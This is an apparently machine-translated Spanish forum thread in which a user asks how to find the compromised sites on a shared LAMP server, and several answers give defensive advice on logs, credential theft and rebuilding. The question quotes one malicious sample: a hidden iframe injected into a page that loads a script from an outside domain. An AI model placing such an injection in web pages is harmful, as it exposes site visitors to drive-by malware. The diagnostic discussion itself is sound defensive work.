Cómo encontrar sitios vulnerables en un servidor web

1

Un cliente mío tiene un VPS administrado con docenas de sitios web, tal vez incluso cientos. Ahora su servidor sigue infectándose regularmente. Los administradores del servidor / webhost continúan cavando en la oscuridad. Ejecutan un escaneo mensual, eliminan el software infectado, pero no pueden decir de qué sitios se originan, ya que los archivos de registro parecen estar limpios.

Utiliza cuteFtp Pro con cifrado de contraseña, por lo que probablemente no esté relacionado con FTP.

Es un sistema LAMP con instalaciones de Apache y PHP / MySQL actualizadas.

¿Ahora existen formas o herramientas para analizar vulnerabilidades en todo el servidor sin revisar cada sitio web manualmente? Es posible que haya algunas instalaciones antiguas de WordPress allí, pero llevaría mucho tiempo revisar cada sitio web individualmente.

Una de las infecciones tiene este aspecto:

</html>
<iframe src="http://autobedrijfboekema.nl/counter.php"style="visibility: hidden; position: absolute; left: 0px; top: 0px"
        width="10" height="10"/>
    
pregunta destiny 06.09.2013 - 12:56
fuente

3 respuestas

1
  

Él usa cuteFtp Pro con cifrado de contraseña, por lo que probablemente no esté relacionado con FTP.

seguro? hay programas maliciosos para el robo de contraseñas de ftp dirigidos al desarrollador que buscan ftp-credentails localmente.

  • ¿Qué quieres decir con "infectado"? subidas maliciosas? inyecciones de sql?
  • ¿Quién / cuántos desarrolladores tienen acceso a ese servidor?

por ese número de instalaciones, debe ser afortunado o ser capaz de identificar los vectores de ataque a través de la correlación de registro, pero esto necesita algo de experiencia al hacerlo.

nr. 1 si ejecuta sitios web orientados a Internet: esté al día con todas las aplicaciones implementadas y su servidor-os.

    
respondido por el that guy from over there 06.09.2013 - 13:08
fuente
1

No hay una manera fácil de resolver esto. El uso de herramientas automatizadas no servirá en este caso; Entiendo que este servidor es enorme como en la cantidad de sitios que aloja.

Estrictamente hablando, si un servidor se ve comprometido, no hay una garantía real de que se limpiará: el único enfoque confiable es atacarlo de la base y reconstruir desde una fuente confiable conocida.

Si no es posible oprimir y reconstruir, y su servidor sigue siendo pirateado, deberá adoptar un enfoque programático para evaluar los puntos en los que pueden surgir vulnerabilidades y cerrar cada brecha.

La clave aquí es la prueba de seguridad manual, es decir, pruebas de penetración, revisiones de compilación y análisis de tráfico.

Comenzaría con una evaluación de seguridad de la infraestructura de la red interna, seguida de una revisión de la compilación de los archivos de configuración de los sistemas operativos y los sistemas de las cajas. Parche y aprieta todo. Una vez hecho esto, puede pasar a las pruebas de penetración en una capa superior (Web).

En resumen, el mejor enfoque sería destruir y reconstruir, aunque costará algo de dinero y tiempo, aún podría ser más barato que realizar una prueba de penetración en todos los niveles. Si, por otro lado, el tiempo y los recursos para este tipo de reconstrucción son imposibles, entonces la única solución es hacer una prueba de todo; así que el tiempo y el dinero, supongo.

    
respondido por el Lex 06.09.2013 - 15:55
fuente
0

En primer lugar, no , no hay una forma automatizada de encontrar malware. Y si lo hubiera, se volvería inmediatamente obsoleto en el momento en que un autor de malware lo viera, ya que el atacante cambia su estrategia para que coincida con el defensor.

Segundo, definitivamente podría estar relacionado con la contraseña. Si su administrador tiene malware en su estación de trabajo o en su red, entonces podría estar filtrando la contraseña al atacante. Esto es muy común. Y un antivirus no es una solución. Cualquier autor de software malicioso remoto puede evadir todos los productos antivirus.

Tercero, revisa tus registros. Mire las fechas en los archivos recién modificados y luego revise sus registros para ver qué sucedió en esa fecha / hora. Esto incluye los registros de FTP y HTTP.

Cuarto, busca ayuda profesional. Hay muchas personas que se ganan la vida resolviendo exactamente este tipo de problema. Hacer esto correctamente requiere práctica y experiencia, y algunos de nosotros hemos estado haciendo esto durante mucho tiempo.

    
respondido por el tylerl 06.09.2013 - 23:47
fuente

Lea otras preguntas en las etiquetas